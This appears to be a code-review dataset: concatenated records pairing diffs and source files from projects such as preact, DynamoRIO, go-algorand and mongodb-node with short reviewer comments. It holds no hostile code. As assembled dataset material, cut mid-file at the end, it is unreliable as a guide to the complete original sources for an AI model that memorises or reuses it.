fig.canvas.draw()
extra_artists = kw.pop("bbox_extra_artists", [])
pad = plt.rcParams['savefig.pad_inches']
bbox_inches = get_tight_bbox(fig, extra_artists, pad=pad)
MPLRenderer.drawn[fig_id] = bbox_inches
kw['bbox_inches'] = bbox_inches
else:
kw['bbox_inches'] = MPLRenderer.drawn[fig_id]
return kw
@classmethod
@contextmanager
def state(cls):
try:
cls._rcParams = dict(mpl.rcParams)
yield
finally:
mpl.rcParams = cls._rcParams
@classmethod
def validate(cls, options):
"""
Validates a dictionary of options set on the backend.
"""
if options['backend']=='matplotlib:nbagg' and options['widgets'] != 'live':
outputwarning.warning("The widget mode must be set to 'live' for "
"matplotlib:nbagg.\nSwitching widget mode to 'live'.")
options['widgets'] = 'live'
return options
@classmethod
def load_nb(cls, inline=True):
"""
Initialize matplotlib backend
"""
import matplotlib.pyplot as plt
plt.switch_backend('agg')
| 1 | 17,409 | As the bokeh renderer also has a ``load_nb`` classmethod (and notebooks are explicitly mentioned in that method name), I would consider making ``_notebook`` into a constant ``notebook_context`` class parameter. The docstring can say it is set to True if the ``load_nb`` classmethod has been called. | holoviz-holoviews | py |
@@ -2,7 +2,6 @@
const CommandOperation = require('./command');
const handleCallback = require('../utils').handleCallback;
-const MongoError = require('../core').MongoError;
class DropCollectionOperation extends CommandOperation {
constructor(db, command, options) { | 1 | 'use strict';
const CommandOperation = require('./command');
const handleCallback = require('../utils').handleCallback;
const MongoError = require('../core').MongoError;
class DropCollectionOperation extends CommandOperation {
constructor(db, command, options) {
super(db, command, options);
}
execute(callback) {
const db = this.db;
super.execute((err, result) => {
// Did the user destroy the topology
if (db.serverConfig && db.serverConfig.isDestroyed()) {
return callback(new MongoError('topology was destroyed'));
}
if (err) return handleCallback(callback, err);
if (result.ok) return handleCallback(callback, null, true);
handleCallback(callback, null, false);
});
}
}
module.exports = DropCollectionOperation;
| 1 | 15,518 | Where is the actual command generated here? Shouldn't this be taking in `constructor(db, collectionName, options)` and then constructing the command off of that? | mongodb-node-mongodb-native | js |
@@ -55,7 +55,8 @@
int
memquery_library_bounds_by_iterator(const char *name, app_pc *start /*IN/OUT*/,
app_pc *end /*OUT*/, char *fullpath /*OPTIONAL OUT*/,
- size_t path_size)
+ size_t path_size, char *filename,
+ size_t filename_size)
{
int count = 0;
bool found_library = false; | 1 | /* *******************************************************************************
* Copyright (c) 2010-2017 Google, Inc. All rights reserved.
* Copyright (c) 2011 Massachusetts Institute of Technology All rights reserved.
* Copyright (c) 2000-2010 VMware, Inc. All rights reserved.
* *******************************************************************************/
/*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* * Neither the name of VMware, Inc. nor the names of its contributors may be
* used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL VMWARE, INC. OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*/
/*
* memquery.c - memory querying code shared across unix platforms
*/
#include "../globals.h"
#include "memquery.h"
#include "module.h"
#include <string.h>
/***************************************************************************
* LIBRARY BOUNDS
*/
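/* On Linux the memquery iterator walks /proc/<pid>/maps, where each entry has
 * the form "start-end perms offset dev inode pathname", e.g. (illustrative):
 *   7f1c2a000000-7f1c2a1c6000 r-xp 00000000 08:01 131093  /lib/libfoo.so
 * A library is usually split across several adjacent entries (text, data,
 * bss), which is why the code below tracks segment bases per pathname.
 */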
/* See memquery.h for full interface specs, which are identical to
* memquery_library_bounds().
*
* XXX: I'd like to make unit tests for these maps file readers, but we
* can't just supply mock maps file entries: this code also walks ELF headers
* which complicates things. For now we just go with live tests.
*/
int
memquery_library_bounds_by_iterator(const char *name, app_pc *start /*IN/OUT*/,
app_pc *end /*OUT*/, char *fullpath /*OPTIONAL OUT*/,
size_t path_size)
{
int count = 0;
bool found_library = false;
char libname[MAXIMUM_PATH];
const char *name_cmp = name;
memquery_iter_t iter;
app_pc target = *start;
app_pc last_lib_base = NULL;
app_pc last_lib_end = NULL;
app_pc prev_base = NULL;
app_pc prev_end = NULL;
uint prev_prot = 0;
size_t image_size = 0;
app_pc cur_end = NULL;
app_pc mod_start = NULL;
ASSERT(name != NULL || start != NULL);
/* If name is non-NULL, start can be NULL, so we have to walk the whole
* address space even when we have syscalls for memquery (e.g., on Mac).
* Even if start is non-NULL, it could be in the middle of the library.
*/
memquery_iterator_start(&iter, NULL,
/* We're never called from a fragile place like a
* signal handler, so as long as it's not real early
* it's ok to alloc.
*/
dynamo_heap_initialized);
libname[0] = '\0';
while (memquery_iterator_next(&iter)) {
LOG(GLOBAL, LOG_VMAREAS, 5, "start=" PFX " end=" PFX " prot=%x comment=%s\n",
iter.vm_start, iter.vm_end, iter.prot, iter.comment);
/* Record the base of each differently-named set of entries up until
* we find our target, when we'll clobber libpath
*/
if (!found_library &&
((iter.comment[0] != '\0' &&
strncmp(libname, iter.comment, BUFFER_SIZE_ELEMENTS(libname)) != 0) ||
(iter.comment[0] == '\0' && prev_end != NULL &&
prev_end != iter.vm_start))) {
last_lib_base = iter.vm_start;
/* Include a prior anon mapping if interrupted and a header and this
* mapping is not a header. This happens for some page mapping
* schemes (i#2566).
*/
if (prev_end == iter.vm_start && prev_prot == (MEMPROT_READ | MEMPROT_EXEC) &&
module_is_header(prev_base, prev_end - prev_base) &&
!module_is_header(iter.vm_start, iter.vm_end - iter.vm_start))
last_lib_base = prev_base;
/* last_lib_end is used to know what's readable beyond last_lib_base */
if (TEST(MEMPROT_READ, iter.prot))
last_lib_end = iter.vm_end;
else
last_lib_end = last_lib_base;
/* remember name so we can find the base of a multiply-mapped so */
strncpy(libname, iter.comment, BUFFER_SIZE_ELEMENTS(libname));
NULL_TERMINATE_BUFFER(libname);
}
if ((name_cmp != NULL &&
(strstr(iter.comment, name_cmp) != NULL ||
/* For Linux, include mid-library (non-.bss) anonymous mappings.
* Our private loader
* fills mapping holes with anonymous memory instead of a
* MEMPROT_NONE mapping from the original file.
* For Mac, this includes mid-library .bss.
*/
(found_library && iter.comment[0] == '\0' && image_size != 0 &&
iter.vm_end - mod_start < image_size))) ||
(name == NULL && target >= iter.vm_start && target < iter.vm_end)) {
if (!found_library && iter.comment[0] == '\0' && last_lib_base == NULL) {
/* Wait for the next entry which should have a file backing. */
target = iter.vm_end;
} else if (!found_library) {
char *dst = (fullpath != NULL) ? fullpath : libname;
const char *src = (iter.comment[0] == '\0') ? libname : iter.comment;
size_t dstsz =
(fullpath != NULL) ? path_size : BUFFER_SIZE_ELEMENTS(libname);
size_t mod_readable_sz;
if (src != dst) {
if (dst == fullpath) {
/* Just the path. We use strstr for name_cmp. */
char *slash = strrchr(src, '/');
ASSERT_CURIOSITY(slash != NULL);
ASSERT_CURIOSITY((slash - src) < dstsz);
/* we keep the last '/' at end */
++slash;
strncpy(dst, src, MIN(dstsz, (slash - src)));
} else
strncpy(dst, src, dstsz);
/* if max no null */
dst[dstsz - 1] = '\0';
}
if (name == NULL)
name_cmp = dst;
found_library = true;
/* Most libraries have multiple segments, and some have the
* ELF header repeated in a later mapping, so we can't rely
* on is_elf_so_header() and header walking.
* We use the name tracking to remember the first entry
* that had this name.
*/
if (last_lib_base == NULL) {
mod_start = iter.vm_start;
mod_readable_sz = iter.vm_end - iter.vm_start;
} else {
mod_start = last_lib_base;
mod_readable_sz = last_lib_end - last_lib_base;
}
if (module_is_header(mod_start, mod_readable_sz)) {
app_pc mod_base, mod_end;
if (module_walk_program_headers(mod_start, mod_readable_sz, false,
/*i#1589: ld.so relocated .dynamic*/
true, &mod_base, NULL, &mod_end, NULL,
NULL)) {
image_size = mod_end - mod_base;
LOG(GLOBAL, LOG_VMAREAS, 4, "%s: image size is " PIFX "\n",
__FUNCTION__, image_size);
ASSERT_CURIOSITY(image_size != 0);
} else {
ASSERT_NOT_REACHED();
}
} else {
ASSERT(false && "expected elf header");
}
}
count++;
cur_end = iter.vm_end;
} else if (found_library) {
/* hit non-matching, we expect module segments to be adjacent */
break;
}
prev_base = iter.vm_start;
prev_end = iter.vm_end;
prev_prot = iter.prot;
}
/* Xref PR 208443: .bss sections are anonymous (no file name listed in
* maps file), but not every library has one. We have to parse the ELF
* header to know since we can't assume that a subsequent anonymous
* region is .bss. */
if (image_size != 0 && cur_end - mod_start < image_size) {
if (iter.comment[0] != '\0') {
/* There's something else in the text-data gap: xref i#2641. */
} else {
/* Found a .bss section. Check current mapping (note: might only be
* part of the mapping, due to os region merging? FIXME investigate).
*/
ASSERT_CURIOSITY(iter.vm_start == cur_end /* no gaps, FIXME might there be
* a gap if the file has large
* alignment and no data section?
* curiosity for now*/);
ASSERT_CURIOSITY(iter.inode == 0); /* .bss is anonymous */
/* should be big enough */
ASSERT_CURIOSITY(iter.vm_end - mod_start >= image_size);
}
count++;
cur_end = mod_start + image_size;
} else {
/* Shouldn't have more mapped than the size of the module, unless it's a
* second adjacent separate map of the same file. Curiosity for now. */
ASSERT_CURIOSITY(image_size == 0 || cur_end - mod_start == image_size);
}
memquery_iterator_stop(&iter);
if (name == NULL && *start < mod_start)
count = 0; /* Our target adjustment missed: we never found a file-backed entry */
if (start != NULL)
*start = mod_start;
if (end != NULL)
*end = cur_end;
return count;
}
| 1 | 14,385 | Mirror the `OPTIONAL OUT` of fullpath | DynamoRIO-dynamorio | c |
@@ -94,13 +94,16 @@ const ConsensusV17 = ConsensusVersion(
"https://github.com/algorandfoundation/specs/tree/5615adc36bad610c7f165fa2967f4ecfa75125f0",
)
+// ConsensusVNext stand-in for protocol with LogicSig and TEAL v1
+const ConsensusVNext = ConsensusVersion("NEXT!")
+
// !!! ********************* !!!
// !!! *** Please update ConsensusCurrentVersion when adding new protocol versions *** !!!
// !!! ********************* !!!
// ConsensusCurrentVersion is the latest version and should be used
// when a specific version is not provided.
-const ConsensusCurrentVersion = ConsensusV17
+const ConsensusCurrentVersion = ConsensusVNext
// ConsensusTest0 is a version of ConsensusV0 used for testing
// (it has different approved upgrade paths). | 1 | // Copyright (C) 2019 Algorand, Inc.
// This file is part of go-algorand
//
// go-algorand is free software: you can redistribute it and/or modify
// it under the terms of the GNU Affero General Public License as
// published by the Free Software Foundation, either version 3 of the
// License, or (at your option) any later version.
//
// go-algorand is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU Affero General Public License for more details.
//
// You should have received a copy of the GNU Affero General Public License
// along with go-algorand. If not, see <https://www.gnu.org/licenses/>.
package protocol
// ConsensusVersion is a string that identifies a version of the
// consensus protocol.
type ConsensusVersion string
// DEPRECATEDConsensusV0 is a baseline version of the Algorand consensus protocol
// at the time versioning was introduced.
// It is now deprecated.
const DEPRECATEDConsensusV0 = ConsensusVersion("v0")
// DEPRECATEDConsensusV1 adds support for Genesis ID in transactions, but does not
// require it (transactions missing a GenesisID value are still allowed).
// It is now deprecated.
const DEPRECATEDConsensusV1 = ConsensusVersion("v1")
// DEPRECATEDConsensusV2 fixes a bug in the agreement protocol where proposalValues
// fail to commit to the original period and sender of a block.
const DEPRECATEDConsensusV2 = ConsensusVersion("v2")
// DEPRECATEDConsensusV3 adds support for fine-grained ephemeral keys.
const DEPRECATEDConsensusV3 = ConsensusVersion("v3")
// DEPRECATEDConsensusV4 adds support for a min balance and a transaction that
// closes out an account.
const DEPRECATEDConsensusV4 = ConsensusVersion("v4")
// DEPRECATEDConsensusV5 sets MinTxnFee to 1000 and fixes a balance lookback bug
const DEPRECATEDConsensusV5 = ConsensusVersion("v5")
// DEPRECATEDConsensusV6 adds support for explicit ephemeral-key parameters
const DEPRECATEDConsensusV6 = ConsensusVersion("v6")
// ConsensusV7 increases MaxBalLookback to 320 in preparation for
// the twin seeds change.
const ConsensusV7 = ConsensusVersion("v7")
// ConsensusV8 uses the new parameters and seed derivation policy
// from the agreement protocol's security analysis.
const ConsensusV8 = ConsensusVersion("v8")
// ConsensusV9 increases min balance to 100,000 microAlgos.
const ConsensusV9 = ConsensusVersion("v9")
// ConsensusV10 introduces fast partition recovery.
const ConsensusV10 = ConsensusVersion("v10")
// ConsensusV11 introduces efficient encoding of SignedTxn using SignedTxnInBlock.
const ConsensusV11 = ConsensusVersion("v11")
// ConsensusV12 increases the maximum length of a version string.
const ConsensusV12 = ConsensusVersion("v12")
// ConsensusV13 makes the consensus version a meaningful string.
const ConsensusV13 = ConsensusVersion(
// Points to version of the Algorand spec as of May 21, 2019.
"https://github.com/algorand/spec/tree/0c8a9dc44d7368cc266d5407b79fb3311f4fc795",
)
// ConsensusV14 adds tracking of closing amounts in ApplyData,
// and enables genesis hash in transactions.
const ConsensusV14 = ConsensusVersion(
"https://github.com/algorand/spec/tree/2526b6ae062b4fe5e163e06e41e1d9b9219135a9",
)
// ConsensusV15 adds tracking of reward distributions in ApplyData.
const ConsensusV15 = ConsensusVersion(
"https://github.com/algorand/spec/tree/a26ed78ed8f834e2b9ccb6eb7d3ee9f629a6e622",
)
// ConsensusV16 fixes domain separation in Credentials and requires GenesisHash.
const ConsensusV16 = ConsensusVersion(
"https://github.com/algorand/spec/tree/22726c9dcd12d9cddce4a8bd7e8ccaa707f74101",
)
// ConsensusV17 points to 'final' spec commit
const ConsensusV17 = ConsensusVersion(
"https://github.com/algorandfoundation/specs/tree/5615adc36bad610c7f165fa2967f4ecfa75125f0",
)
// !!! ********************* !!!
// !!! *** Please update ConsensusCurrentVersion when adding new protocol versions *** !!!
// !!! ********************* !!!
// ConsensusCurrentVersion is the latest version and should be used
// when a specific version is not provided.
const ConsensusCurrentVersion = ConsensusV17
// ConsensusTest0 is a version of ConsensusV0 used for testing
// (it has different approved upgrade paths).
const ConsensusTest0 = ConsensusVersion("test0")
// ConsensusTest1 is an extension of ConsensusTest0 that
// supports a sorted-list balance commitment.
const ConsensusTest1 = ConsensusVersion("test1")
// ConsensusTestBigBlocks is a version of ConsensusV0 used for testing
// with big block size (large MaxTxnBytesPerBlock).
const ConsensusTestBigBlocks = ConsensusVersion("test-big-blocks")
// ConsensusTestRapidRewardRecalculation is a version of ConsensusCurrentVersion
// that decreases the RewardRecalculationInterval greatly.
const ConsensusTestRapidRewardRecalculation = ConsensusVersion("test-fast-reward-recalculation")
// ConsensusTestFastUpgrade is meant for testing of protocol upgrades:
// during testing, it is equivalent to another protocol with the exception
// of the upgrade parameters, which allow for upgrades to take place after
// only a few rounds.
func ConsensusTestFastUpgrade(proto ConsensusVersion) ConsensusVersion {
return "test-fast-upgrade-" + proto
}
| 1 | 36,100 | Please merge with master and replace with with "future" version. | algorand-go-algorand | go |
@@ -55,7 +55,6 @@ export function diff(dom, parentDom, newVNode, oldVNode, context, isSvg, excessD
let cxType = newType.contextType;
let provider = cxType && context[cxType._id];
let cctx = cxType != null ? (provider ? provider.props.value : cxType._defaultValue) : context;
-
// Get component and set it to `c`
if (oldVNode._component) {
c = newVNode._component = oldVNode._component; | 1 | import { EMPTY_OBJ, EMPTY_ARR } from '../constants';
import { Component, enqueueRender } from '../component';
import { coerceToVNode, Fragment } from '../create-element';
import { diffChildren } from './children';
import { diffProps } from './props';
import { assign, removeNode } from '../util';
import options from '../options';
/**
* Diff two virtual nodes and apply proper changes to the DOM
* @param {import('../internal').PreactElement | Text} dom The DOM element representing
* the virtual nodes under diff
* @param {import('../internal').PreactElement} parentDom The parent of the DOM element
* @param {import('../internal').VNode | null} newVNode The new virtual node
* @param {import('../internal').VNode | null} oldVNode The old virtual node
* @param {object} context The current context object
* @param {boolean} isSvg Whether or not this element is an SVG node
* @param {Array<import('../internal').PreactElement>} excessDomChildren
* @param {Array<import('../internal').Component>} mounts A list of newly
* mounted components
* @param {import('../internal').Component | null} ancestorComponent The direct
* parent component
*/
export function diff(dom, parentDom, newVNode, oldVNode, context, isSvg, excessDomChildren, mounts, ancestorComponent, force) {
// If the previous type doesn't match the new type we drop the whole subtree
if (oldVNode==null || newVNode==null || oldVNode.type!==newVNode.type) {
if (oldVNode!=null) unmount(oldVNode, ancestorComponent);
if (newVNode==null) return null;
dom = null;
oldVNode = EMPTY_OBJ;
}
if (options.diff) options.diff(newVNode);
let c, p, isNew = false, oldProps, oldState, snapshot,
newType = newVNode.type;
/** @type {import('../internal').Component | null} */
let clearProcessingException;
try {
outer: if (oldVNode.type===Fragment || newType===Fragment) {
diffChildren(parentDom, newVNode, oldVNode, context, isSvg, excessDomChildren, mounts, c);
if (newVNode._children.length) {
dom = newVNode._children[0]._dom;
newVNode._lastDomChild = newVNode._children[newVNode._children.length - 1]._dom;
}
}
else if (typeof newType==='function') {
// Necessary for createContext api. Setting this property will pass
// the context value as `this.context` just for this component.
let cxType = newType.contextType;
let provider = cxType && context[cxType._id];
let cctx = cxType != null ? (provider ? provider.props.value : cxType._defaultValue) : context;
// Get component and set it to `c`
if (oldVNode._component) {
c = newVNode._component = oldVNode._component;
clearProcessingException = c._processingException;
}
else {
// Instantiate the new component
if (newType.prototype && newType.prototype.render) {
newVNode._component = c = new newType(newVNode.props, cctx); // eslint-disable-line new-cap
}
else {
newVNode._component = c = new Component(newVNode.props, cctx);
c.constructor = newType;
c.render = doRender;
}
c._ancestorComponent = ancestorComponent;
if (provider) provider.sub(c);
c.props = newVNode.props;
if (!c.state) c.state = {};
c.context = cctx;
c._context = context;
isNew = c._dirty = true;
c._renderCallbacks = [];
}
c._vnode = newVNode;
// Invoke getDerivedStateFromProps
let s = c._nextState || c.state;
if (newType.getDerivedStateFromProps!=null) {
oldState = assign({}, c.state);
if (s===c.state) s = c._nextState = assign({}, s);
assign(s, newType.getDerivedStateFromProps(newVNode.props, s));
}
// Invoke pre-render lifecycle methods
if (isNew) {
if (newType.getDerivedStateFromProps==null && c.componentWillMount!=null) c.componentWillMount();
if (c.componentDidMount!=null) mounts.push(c);
}
else {
if (newType.getDerivedStateFromProps==null && force==null && c.componentWillReceiveProps!=null) {
c.componentWillReceiveProps(newVNode.props, cctx);
s = c._nextState || c.state;
}
if (!force && c.shouldComponentUpdate!=null && c.shouldComponentUpdate(newVNode.props, s, cctx)===false) {
c.props = newVNode.props;
c.state = s;
c._dirty = false;
break outer;
}
if (c.componentWillUpdate!=null) {
c.componentWillUpdate(newVNode.props, s, cctx);
}
}
oldProps = c.props;
if (!oldState) oldState = c.state;
c.context = cctx;
c.props = newVNode.props;
c.state = s;
if (options.render) options.render(newVNode);
let prev = c._prevVNode;
let vnode = c._prevVNode = coerceToVNode(c.render(c.props, c.state, c.context));
c._dirty = false;
if (c.getChildContext!=null) {
context = assign(assign({}, context), c.getChildContext());
}
if (!isNew && c.getSnapshotBeforeUpdate!=null) {
snapshot = c.getSnapshotBeforeUpdate(oldProps, oldState);
}
c.base = dom = diff(dom, parentDom, vnode, prev, context, isSvg, excessDomChildren, mounts, c, null);
if (vnode!=null) {
// If this component returns a Fragment (or another component that
// returns a Fragment), then _lastDomChild will be non-null,
// informing `diffChildren` to diff this component's VNode like a Fragment
newVNode._lastDomChild = vnode._lastDomChild;
}
c._parentDom = parentDom;
if (newVNode.ref) applyRef(newVNode.ref, c, ancestorComponent);
}
else {
dom = diffElementNodes(dom, newVNode, oldVNode, context, isSvg, excessDomChildren, mounts, ancestorComponent);
if (newVNode.ref && (oldVNode.ref !== newVNode.ref)) {
applyRef(newVNode.ref, dom, ancestorComponent);
}
}
newVNode._dom = dom;
if (c!=null) {
while (p=c._renderCallbacks.pop()) p.call(c);
// Don't call componentDidUpdate on mount or when we bailed out via
// `shouldComponentUpdate`
if (!isNew && oldProps!=null && c.componentDidUpdate!=null) {
c.componentDidUpdate(oldProps, oldState, snapshot);
}
}
if (clearProcessingException) {
c._processingException = null;
}
if (options.diffed) options.diffed(newVNode);
}
catch (e) {
catchErrorInComponent(e, ancestorComponent);
}
return dom;
}
export function commitRoot(mounts, root) {
let c;
while ((c = mounts.pop())) {
try {
c.componentDidMount();
}
catch (e) {
catchErrorInComponent(e, c._ancestorComponent);
}
}
if (options.commit) options.commit(root);
}
/**
* Diff two virtual nodes representing DOM element
* @param {import('../internal').PreactElement} dom The DOM element representing
* the virtual nodes being diffed
* @param {import('../internal').VNode} newVNode The new virtual node
* @param {import('../internal').VNode} oldVNode The old virtual node
* @param {object} context The current context object
* @param {boolean} isSvg Whether or not this DOM node is an SVG node
* @param {*} excessDomChildren
* @param {Array<import('../internal').Component>} mounts An array of newly
* mounted components
* @param {import('../internal').Component} ancestorComponent The parent
* component to the ones being diffed
* @returns {import('../internal').PreactElement}
*/
function diffElementNodes(dom, newVNode, oldVNode, context, isSvg, excessDomChildren, mounts, ancestorComponent) {
let d = dom;
// Tracks entering and exiting SVG namespace when descending through the tree.
isSvg = newVNode.type==='svg' || isSvg;
if (dom==null && excessDomChildren!=null) {
for (let i=0; i<excessDomChildren.length; i++) {
const child = excessDomChildren[i];
if (child!=null && (newVNode.type===null ? child.nodeType===3 : child.localName===newVNode.type)) {
dom = child;
excessDomChildren[i] = null;
break;
}
}
}
if (dom==null) {
dom = newVNode.type===null ? document.createTextNode(newVNode.text) : isSvg ? document.createElementNS('http://www.w3.org/2000/svg', newVNode.type) : document.createElement(newVNode.type);
// we created a new parent, so none of the previously attached children can be reused:
excessDomChildren = null;
}
newVNode._dom = dom;
if (newVNode.type===null) {
if ((d===null || dom===d) && newVNode.text!==oldVNode.text) {
dom.data = newVNode.text;
}
}
else {
if (excessDomChildren!=null && dom.childNodes!=null) {
excessDomChildren = EMPTY_ARR.slice.call(dom.childNodes);
}
if (newVNode!==oldVNode) {
let oldProps = oldVNode.props;
let newProps = newVNode.props;
// if we're hydrating, use the element's attributes as its current props:
if (oldProps==null) {
oldProps = {};
if (excessDomChildren!=null) {
let name;
for (let i=0; i<dom.attributes.length; i++) {
name = dom.attributes[i].name;
oldProps[name=='class' && newProps.className ? 'className' : name] = dom.attributes[i].value;
}
}
}
let oldHtml = oldProps.dangerouslySetInnerHTML;
let newHtml = newProps.dangerouslySetInnerHTML;
if (newHtml || oldHtml) {
// Avoid re-applying the same '__html' if it did not change between re-renders
if (!newHtml || !oldHtml || newHtml.__html!=oldHtml.__html) {
dom.innerHTML = newHtml && newHtml.__html || '';
}
}
if (newProps.multiple) {
dom.multiple = newProps.multiple;
}
diffChildren(dom, newVNode, oldVNode, context, newVNode.type==='foreignObject' ? false : isSvg, excessDomChildren, mounts, ancestorComponent);
diffProps(dom, newProps, oldProps, isSvg);
}
}
return dom;
}
/**
* Invoke or update a ref, depending on whether it is a function or object ref.
* @param {object|function} [ref=null]
* @param {any} [value]
*/
export function applyRef(ref, value, ancestorComponent) {
try {
if (typeof ref=='function') ref(value);
else ref.current = value;
}
catch (e) {
catchErrorInComponent(e, ancestorComponent);
}
}
/**
* Unmount a virtual node from the tree and apply DOM changes
* @param {import('../internal').VNode} vnode The virtual node to unmount
* @param {import('../internal').Component} ancestorComponent The parent
* component to this virtual node
* @param {boolean} skipRemove Flag that indicates that a parent node of the
* current element is already detached from the DOM.
*/
export function unmount(vnode, ancestorComponent, skipRemove) {
let r;
if (options.unmount) options.unmount(vnode);
if (r = vnode.ref) {
applyRef(r, null, ancestorComponent);
}
if (!skipRemove && vnode._lastDomChild==null && (skipRemove = ((r = vnode._dom)!=null))) removeNode(r);
vnode._dom = vnode._lastDomChild = null;
if ((r = vnode._component)!=null) {
if (r.componentWillUnmount) {
try {
r.componentWillUnmount();
}
catch (e) {
catchErrorInComponent(e, ancestorComponent);
}
}
r.base = r._parentDom = null;
if (r = r._prevVNode) unmount(r, ancestorComponent, skipRemove);
}
else if (r = vnode._children) {
for (let i = 0; i < r.length; i++) {
unmount(r[i], ancestorComponent, skipRemove);
}
}
}
/** The `.render()` method for a PFC backing instance. */
function doRender(props, state, context) {
return this.constructor(props, context);
}
/**
* Find the closest error boundary to a thrown error and call it
* @param {object} error The thrown value
* @param {import('../internal').Component} component The first ancestor
* component check for error boundary behaviors
*/
function catchErrorInComponent(error, component) {
for (; component; component = component._ancestorComponent) {
if (!component._processingException) {
try {
if (component.constructor.getDerivedStateFromError!=null) {
component.setState(component.constructor.getDerivedStateFromError(error));
}
else if (component.componentDidCatch!=null) {
component.componentDidCatch(error);
}
else {
continue;
}
return enqueueRender(component._processingException = component);
}
catch (e) {
error = e;
}
}
}
throw error;
}
| 1 | 12,900 | Nit: Change is not needed for this PR :slightly_smiling_face: | preactjs-preact | js |
@@ -11,6 +11,15 @@ module CloudFoundry
end
end
+ def self.app_url
+ if self.is_environment?
+ # (arbitrarily) use the shortest assigned route, if there are multiple
+ self.vcap_data['application_uris'].min_by(&:length)
+ else
+ nil
+ end
+ end
+
# returns `true` if this app is running in Cloud Foundry
def self.is_environment?
!!self.raw_vcap_data | 1 | module CloudFoundry
def self.raw_vcap_data
ENV['VCAP_APPLICATION']
end
def self.vcap_data
if self.is_environment?
JSON.parse(self.raw_vcap_data)
else
nil
end
end
# returns `true` if this app is running in Cloud Foundry
def self.is_environment?
!!self.raw_vcap_data
end
def self.instance_index
if self.is_environment?
self.vcap_data['instance_index']
else
nil
end
end
end
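# Illustrative sketch (not part of the original file): a Ruby `if` with no
# matching branch already evaluates to nil, so the `else nil` arms used above
# (and in the proposed app_url) could be dropped without changing behaviour:
#
#   def self.app_url
#     if self.is_environment?
#       # (arbitrarily) use the shortest assigned route, if there are multiple
#       self.vcap_data['application_uris'].min_by(&:length)
#     end
#   end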
| 1 | 14,492 | if we are returning `nil` from an `else` I think we can just remove the `else` (and this method will still return `nil`) | 18F-C2 | rb |
@@ -9,7 +9,7 @@ using System.Threading.Tasks;
namespace System.Threading.Tests
{
[BenchmarkCategory(Categories.CoreFX)]
- public class TimerPerfTest
+ public class Perf_Timer
{
private readonly Timer[] _timers = new Timer[1_000_000];
private readonly Task[] _tasks = new Task[Environment.ProcessorCount]; | 1 | // Licensed to the .NET Foundation under one or more agreements.
// The .NET Foundation licenses this file to you under the MIT license.
// See the LICENSE file in the project root for more information.
using BenchmarkDotNet.Attributes;
using MicroBenchmarks;
using System.Threading.Tasks;
namespace System.Threading.Tests
{
[BenchmarkCategory(Categories.CoreFX)]
public class TimerPerfTest
{
private readonly Timer[] _timers = new Timer[1_000_000];
private readonly Task[] _tasks = new Task[Environment.ProcessorCount];
[Benchmark]
public void ShortScheduleAndDispose() => new Timer(_ => { }, null, 50, -1).Dispose();
[Benchmark]
public void LongScheduleAndDispose() => new Timer(_ => { }, null, int.MaxValue, -1).Dispose();
[Benchmark]
public void ScheduleManyThenDisposeMany()
{
Timer[] timers = _timers;
for (int i = 0; i < timers.Length; i++)
{
timers[i] = new Timer(_ => { }, null, int.MaxValue, -1);
}
foreach (Timer timer in timers)
{
timer.Dispose();
}
}
[Benchmark]
public void SynchronousContention()
{
Task[] tasks = _tasks;
for (int i = 0; i < tasks.Length; i++)
{
tasks[i] = Task.Run(() =>
{
for (int j = 0; j < 1_000_000; j++)
{
new Timer(delegate { }, null, int.MaxValue, -1).Dispose();
}
});
}
Task.WaitAll(tasks);
}
[Benchmark]
public void AsynchronousContention()
{
Task[] tasks = _tasks;
for (int i = 0; i < tasks.Length; i++)
{
tasks[i] = Task.Run(async () =>
{
for (int j = 0; j < 1_000_000; j++)
{
using (var t = new Timer(delegate { }, null, int.MaxValue, -1))
{
await Task.Yield();
}
}
});
}
Task.WaitAll(tasks);
}
}
}
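// Illustrative sketch (not part of the original file): with BenchmarkDotNet the renamed
// class can be selected by a glob filter on its full name (namespace + type), e.g.
//
//   dotnet run -c Release -- --filter 'System.Threading.Tests.Perf_Timer.*'
//
// The exact harness arguments are an assumption; only the namespace, type and method
// names come from the file above.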
| 1 | 7,727 | side note: this change is ok as of today because we have not exported the results for this new type to BenchView yet. After we do that, the namespace, type name and method name should not be changed (they create a benchmark ID which is used in BenchView). | dotnet-performance | .cs |
@@ -294,7 +294,15 @@ namespace pwiz.Skyline.Model.Lib.Midas
_spectra = null;
if (FilePath == null)
return false;
- var info = new FileInfo(FilePath);
+ FileInfo info;
+ try
+ {
+ info = new FileInfo(FilePath);
+ }
+ catch
+ {
+ return false;
+ }
if (!info.Exists || info.Length == 0)
return false;
| 1 | /*
* Original author: Kaipo Tamura <kaipot .at. u.washington.edu>,
* MacCoss Lab, Department of Genome Sciences, UW
*
* Copyright 2016 University of Washington - Seattle, WA
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
using System;
